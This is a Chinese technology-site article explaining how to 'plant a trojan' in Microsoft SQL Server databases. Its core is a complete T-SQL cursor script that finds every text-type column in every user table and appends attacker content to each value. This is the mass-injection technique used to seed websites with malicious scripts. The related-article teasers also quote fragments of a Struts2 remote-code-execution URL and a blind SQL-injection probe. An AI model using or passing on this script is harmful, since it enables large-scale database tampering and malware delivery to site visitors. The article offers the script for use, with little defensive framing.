驱动管家:安全、高效、精准的专业驱动下载站!

ms挂马方法 ms如何挂马?

2018-03-01 10:26:01责编:llp   来源:驱动管家     人气:

以前说过的趋势挂马事件,MS这个挂马方法已经流行了很久,从去年就大规模开始了,在网上可以搜到很多痕迹。

ms挂马方法 ms如何挂马?

SQL语句如下:

用游标遍历所有表里如下数据类型的字段,然后UPDATE挂马。(全部是允许写入字符的字段)

xtype=99 ntext

xtype=35 text

xtype=231 nvarchar

xtype=167 varchar

———————YD的分割——————————–

DECLARE @T varchar(255),

@C varchar(255)

DECLARE Table_Cursor CURSOR FOR

Select

a.name,b.name

from sysobjects a,

syscolumns b

where a.id=b.id and

a.xtype=’u’ and

(b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)

OPEN Table_Cursor

FETCH NEXT FROM Table_Cursor INTO @T,@C

WHILE(@@FETCH_STATUS=0)

BEGIN

exec(’update [’ @T ’] set [’ @C ’]=

rtrim(convert(varchar,[’ @C ’]))

”挂马内容”’)

FETCH NEXT FROM Table_Cursor INTO @T,@C

END

CLOSE Table_Cursor

DEALLOCATE Table_Cursor

———————YD的分割——————————–

  • 无线网络安全怎么提高?提高无线网络安全的方法

    无线网络安全怎么提高?提高无线网络安全的方法

    如下具体解析提高无线网络安全的几个妙招:1 无线加密首先说一下无线加密,这种保护方式是目前最为常见的一种手段,用户可以通过无线路由器的WEB界,来对无线网络进行加密设置。目前,无线路由器或AP的加密类型一

    详情2018-01-09 13:34:07责编:llp   来源:驱动管家     
  • 怎么通过序列号加密软件?序列号加密程序是什么?

    怎么通过序列号加密软件?序列号加密程序是什么?

    数学算法一项都是密码加密的核心,但在一般的软件加密中,它似乎并不太为人们关心,因为大多数时候软件加密本身实现的都是一种编程的技巧。但近几年来随着序列号加密程序的普及,数学算法在软件加密中的比重似乎

    详情2018-01-21 21:11:33责编:llp   来源:驱动管家     
  • openbsd是什么?openbsd系统有什么漏洞?

    openbsd是什么?openbsd系统有什么漏洞?

    受影响系统:OpenBSD OpenBSD 4 2OpenBSD OpenBSD 4 1OpenBSD OpenBSD 4 0描述:BUGTRAQ ID: 25984CVE(CAN) ID: CVE-2007-5365OpenBSD是一款开放源代码Unix类操作系统。OpenBSD系统的DHCP协议实现上存

    详情2018-01-24 16:40:45责编:llp   来源:驱动管家     
  • 怎么使用、创建和维护oracle密码文件? oracle创建用户的方法
    详情2018-01-12 09:53:20责编:llp   来源:驱动管家     
  • 免费wifi怎么盗取信息?免费wifi信息盗取的手段

    免费wifi怎么盗取信息?免费wifi信息盗取的手段

    A、公共场所免费的WiFi是元凶,假WiFi15分钟可盗取信息据介绍,这种骗术的成本并不高,一台WIN7系统电脑、一套无线网络及一个网络包分析软件,设置一个无线热点AP,就可以轻松地搭建一个不设密码的WiFi。现如今公

    详情2018-01-06 09:20:41责编:llp   来源:驱动管家     
  • 动易4.03漏洞在哪里?动易4.03漏洞的原理

    动易4.03漏洞在哪里?动易4.03漏洞的原理

    动易4 03上传漏洞。2005-1-10 就出来了,一直没有公布。看黑客防线的攻关第3关用的是动易所有公布出来了。影响版本: 动易4 03上面的是动易的上传代码,从上面分析,我们可以看到,它明显存在着上传漏洞。重要的

    详情2018-02-26 17:05:57责编:llp   来源:驱动管家     
  • 怎么改ip地址?改ip地址的具体步骤

    怎么改ip地址?改ip地址的具体步骤

    第一步:右键点击桌面“网络”,单击“属性”,出现如下“网络和共享中心”。(图 1)第二步:在对应的网络连接右边点击“查看状态”。(也可以点击“管理网络连接”,如果您是通过有线的方式连接路由器,右键单

    详情2018-01-06 17:39:19责编:llp   来源:驱动管家     
  • struts2漏洞爆出 怎么解决struts2漏洞?

    struts2漏洞爆出 怎么解决struts2漏洞?

    在2013年6月底发布的Struts 2 3 15版本被曝出存在重要的安全漏洞 ,主要问题如下:可远程执行服务器脚本代码用户可以构造http: host struts2-blank example X action?action:%25{(new+java lang ProcessBuilde

    详情2018-01-17 16:25:11责编:llp   来源:驱动管家     
  • 开源应用程序防火墙WebKnight如何在iis6中安装?

    开源应用程序防火墙WebKnight如何在iis6中安装?

    网站被“成功”注入,网站一些页面被插入了下载病毒的代码,经查:生产服务器的代码没有任何被改动过的迹象,排除服务器被入侵,代码被篡改的可能;有病毒下载代码的部分,在数据库里真实看到了篡改迹象,可以排

    详情2018-02-28 15:41:15责编:llp   来源:驱动管家     
  • 虚拟主机怎么被黑客入侵?黑客入侵虚拟主机的步骤

    虚拟主机怎么被黑客入侵?黑客入侵虚拟主机的步骤

    问题文件出在admin user asp 提交 http: www xxx com down admin user asp?user=admin’ and asc(mid(pwd,1,1))>37 and ’1’=’1 就相当于: select * from UserInfo where user=’

    详情2018-01-10 13:56:33责编:llp   来源:驱动管家